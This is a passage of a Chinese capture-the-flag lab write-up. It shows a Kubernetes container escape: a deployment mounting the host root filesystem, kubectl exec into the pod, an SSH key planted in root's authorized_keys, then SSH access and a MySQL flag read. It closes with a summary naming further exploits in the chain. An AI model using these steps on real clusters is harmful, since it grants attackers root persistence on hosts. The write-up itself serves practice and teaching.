}
编辑evil-deployment.yaml,创建一个特权容器,将宿主机/目录挂载到容器内部/mnt目录
┌──(kali㉿kali)-[~/GreatWall]
└─$ vim evil-deployment.yaml
配置文件
#evil-deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: nginx-deployment
labels:
app: nginx
spec:
replicas: 1
selector:
matchLabels:
app: nginx
template:
metadata:
labels:
app: nginx
spec:
containers:
- name: nginx
image: nginx:1.8
volumeMounts:
- mountPath: /mnt
name: test-volume
volumes:
- name: test-volume
hostPath:
path: /
用kubectl apply配置创建pod,get获取pod,exec进入pod内部。使用kali的proxychain4会卡住服了,只能去下载一个exe了
E:\渗透\春秋云镜>kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil-deployment.yaml
Please enter Username: 1
Please enter Password: deployment.apps/nginx-deployment unchanged
E:\渗透\春秋云镜>kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
Please enter Username: 1
Please enter Password: NAME READY STATUS RESTARTS AGE
nginx-deployment-864f8bfd6f-wg9bn 1/1 Running 0 49s
E:\渗透\春秋云镜>kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-wg9bn /bin/bash
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
Please enter Username: test
Please enter Password: root@nginx-deployment-864f8bfd6f-wg9bn:/#
root@nginx-deployment-864f8bfd6f-wg9bn:/# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC27Gv0W3j0TPawzx/q7rDyzDBYiuRRSs4HLFBpmYIxkxviNL1njJNjA3Mw7UcLAa6o62H7Xn6jlYijg8Q8ttm/BDqtI0N645DrdMOOR6W0N+iZKnkDx7QJ5vPcwE4XTu4rQleQD3fvO8KRAUBakMVPocaai3V9eC9zE4Ex3W/qo0Xk+PNObx5mIT39coHAq7DxzSoWsnHOVnFYqvXgzD44txWOMHIdqSp93AWV0+d37diHgDDWvpxS/BpKfydSFtR728dJ2KXuNfWSiy3R5wPGW6p9JffExiyrg/d6Nw74+8TrzxELM0r0gRjTefVbPZyK8fa4Q2xRPrSaD5bYeIt/wNU6YgWTquj3aPY70eTzkK6gckvwOAmRQ8lLCG67Z8IbnHeQVkVg4uuujq6nRsvMx+YbTTCOLEZQkCQKjpubJYDZsncP9LSNxn/Sq5vpEtKXbBfl1qD41tU72/wg2A4PiYrDkgr3LP26Qbg66xY7Hmtb6PgVe1VnmRoWuUJ6T/S5AtLBNljksXAJru/9HwP0bNpgTuMV06U5JySzf7OoT6Nye5zCOzrWOi3NrZGiKb55ue0EnoFvs1ZEuhgxH/VjdzXNCtV3OJtdlRqbrd+q5Si6fT3ew81tLK040T2w3oKIhIJa9JbhuOK2SR2gXv96qu045/NtXC/re56IIw+Xfw== root@kali-plus" > /mnt/root/.ssh/authorized_keys
使用kali去ssh连接即可,然后连上数据库,flag04在数据库中
┌──(root㉿kali-plus)-[~/.ssh]
└─# proxychains4 ssh -i id_rsa1 root@172.22.14.37
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.37:22 ... OK
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-213-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Welcome to Alibaba Cloud Elastic Compute Service !
Last login: Mon Mar 17 16:32:24 2025 from 106.37.219.130
root@ubuntu-k8s:~# ls
metarget nginx-deployment.yaml
root@ubuntu-k8s:~# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.7.42-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| flaghaha |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)
mysql> use flaghaha
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed, 3 warnings
mysql> show tables;
+--------------------+
| Tables_in_flaghaha |
+--------------------+
| flag04 |
+--------------------+
1 row in set (0.00 sec)
mysql> select * from flag04;
+------+--------------------------------------------------------------+
| id | f1agggggishere |
+------+--------------------------------------------------------------+
| 1 | ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg== |
+------+--------------------------------------------------------------+
1 row in set (0.01 sec)
┌──(root㉿kali-plus)-[~]
└─# echo 'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg=='|base64 -d
flag{da69c459-7fe5-4535-b8d1-15fff496a29f}
完结撒花
小结
这个靶机前面都还好做,Thinkphp5023-RCE有现成的利用工具,所以第一台机子的shell还是比较好拿的,然后就是上传fscan和stowaway,使用fscan扫一下网段得到下面有2条路,一条是新翔OA文件上传,另一条是Heapdump内存泄露接着打一个Pwn,拿到文件上传机子的shell之后又分为两条路,分别k8s未授权和Harbor紧接着Mysql数据库UDF提权;卡就卡在新翔OA文件上传那有一个绕过disable_functions,但是蚁剑的插件不太好用,还需要手动改成get,改成get还是不怎么好用,最后找到ta0师傅的wp,用它的exp,可以进行命令执行,直接用stowaway去连接,在原来的代理上开二级代理;其中还有一个Harbor-CVE-2022-46463要找poc,但是当时线下好像不出网,也就是说你要有本地漏洞库并且有这个漏洞的poc
浙公网安备 33010602011771号